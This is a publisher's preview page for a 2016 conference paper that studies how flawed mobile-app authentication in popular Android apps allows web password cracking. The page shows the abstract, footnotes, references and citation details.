Skip to main content
SpringerLink
Log in

Open Sesame! Web Authentication Cracking via Mobile App Analysis

  • Conference paper
  • First Online:
Web Technologies and Applications (APWeb 2016)

Part of the book series: Lecture Notes in Computer Science ((LNISA,volume 9932))

Included in the following conference series:

  • 1618 Accesses

Abstract

Web authentication security can be undermined by flawed mobile web implementations. Mobile web implementations may use less secure transport channel and enforce less strict brute-force-proof measures, making web authentication services vulnerable to typical attacks such as password cracking. This paper presents an in-depth penetration testing based on a comprehensive dynamic app analysis focusing on vulnerable authentication implementations of Android apps. An analysis of Top 200 apps from China Android Market and Top 100 apps from Google Play Market is conducted. The result shows that 71.3 % apps we analyze fails to protect users’ password appropriately. And an experiment carried out among 20 volunteers indicates that 84.4 % passwords can be cracked with the knowledge of password transformation process.

This is a preview of subscription content, log in via an institution to check access.

Access this chapter

Log in via an institution
Chapter
USD 29.95
Price excludes VAT (USA)
  • Available as PDF
  • Read on any device
  • Instant download
  • Own it forever
eBook
USD 39.99
Price excludes VAT (USA)
  • Available as EPUB and PDF
  • Read on any device
  • Instant download
  • Own it forever
Softcover Book
USD 54.99
Price excludes VAT (USA)
  • Compact, lightweight edition
  • Dispatched in 3 to 5 business days
  • Free shipping worldwide - see info

Tax calculation will be finalised at checkout

Purchases are for personal use only

Institutional subscriptions

Notes

  1. 1.

    During user authentication, an app typically receives a password, encodes or encrypts it, and sends the result together with other data to a remote web server. We let authenticator denote the result for the rest of this paper.

  2. 2.

    Other apps are either packed or involved with native APIs, in which case manual intervention is needed.

References

  1. Appium automation for apps. http://appium.io/. Accessed 20 Apr 2016

  2. Bugiel, S., Davi, L., Dmitrienko, A., Fischer, T., Sadeghi, A., Shastry, B.: Towards taming privilege-escalation attacks on android. In: NDSS (2012)

    Google Scholar 

  3. Cai, F., Hao, C., Yuanyi, W., Yuan, Z.: Appcracker: widespread vulnerabilities in user and session authentication in mobile apps. In: IEEE Mobile Security Technologies. IEEE (2015)

    Google Scholar 

  4. Fahl, S., Harbach, M., Muders, T., Baumgärtner, L., Freisleben, B., Smith, M.: Why eve, mallory love android: an analysis of android ssl (in) security. In: Proceedings of the ACM Conference on Computer and Communications Security, pp. 50–61. ACM (2012)

    Google Scholar 

Download references

Acknowledgments

This work is supported by the Major program of Shanghai Science and Technology Commission (15511103002).

Author information

Authors and Affiliations

  1. Computer Science and Engineering Department, Shanghai Jiao Tong University, Shanghai, China

    Hui Liu, Yuanyuan Zhang, Juanru Li, Hui Wang & Dawu Gu

Authors
  1. Hui Liu
    View author publications

    You can also search for this author in PubMed Google Scholar

  2. Yuanyuan Zhang
    View author publications

    You can also search for this author in PubMed Google Scholar

  3. Juanru Li
    View author publications

    You can also search for this author in PubMed Google Scholar

  4. Hui Wang
    View author publications

    You can also search for this author in PubMed Google Scholar

  5. Dawu Gu
    View author publications

    You can also search for this author in PubMed Google Scholar

Corresponding author

Correspondence to Hui Liu .

Editor information

Editors and Affiliations

  1. School of Computing, University of Utah, Salt Lake City, Utah, USA

    Feifei Li

  2. School of Electrical Engineering, Seoul National University, Seoul, Korea (Republic of)

    Kyuseok Shim

  3. Soochow University , Suzhou, China

    Kai Zheng

  4. Soochow University , Suzhou, China

    Guanfeng Liu

Rights and permissions

Reprints and permissions

Copyright information

© 2016 Springer International Publishing Switzerland

About this paper

Cite this paper

Liu, H., Zhang, Y., Li, J., Wang, H., Gu, D. (2016). Open Sesame! Web Authentication Cracking via Mobile App Analysis. In: Li, F., Shim, K., Zheng, K., Liu, G. (eds) Web Technologies and Applications. APWeb 2016. Lecture Notes in Computer Science(), vol 9932. Springer, Cham. https://doi.org/10.1007/978-3-319-45817-5_51

Download citation

  • DOI: https://doi.org/10.1007/978-3-319-45817-5_51

  • Published:

  • Publisher Name: Springer, Cham

  • Print ISBN: 978-3-319-45816-8

  • Online ISBN: 978-3-319-45817-5

  • eBook Packages: Computer ScienceComputer Science (R0)

Publish with us

Policies and ethics

Search

Navigation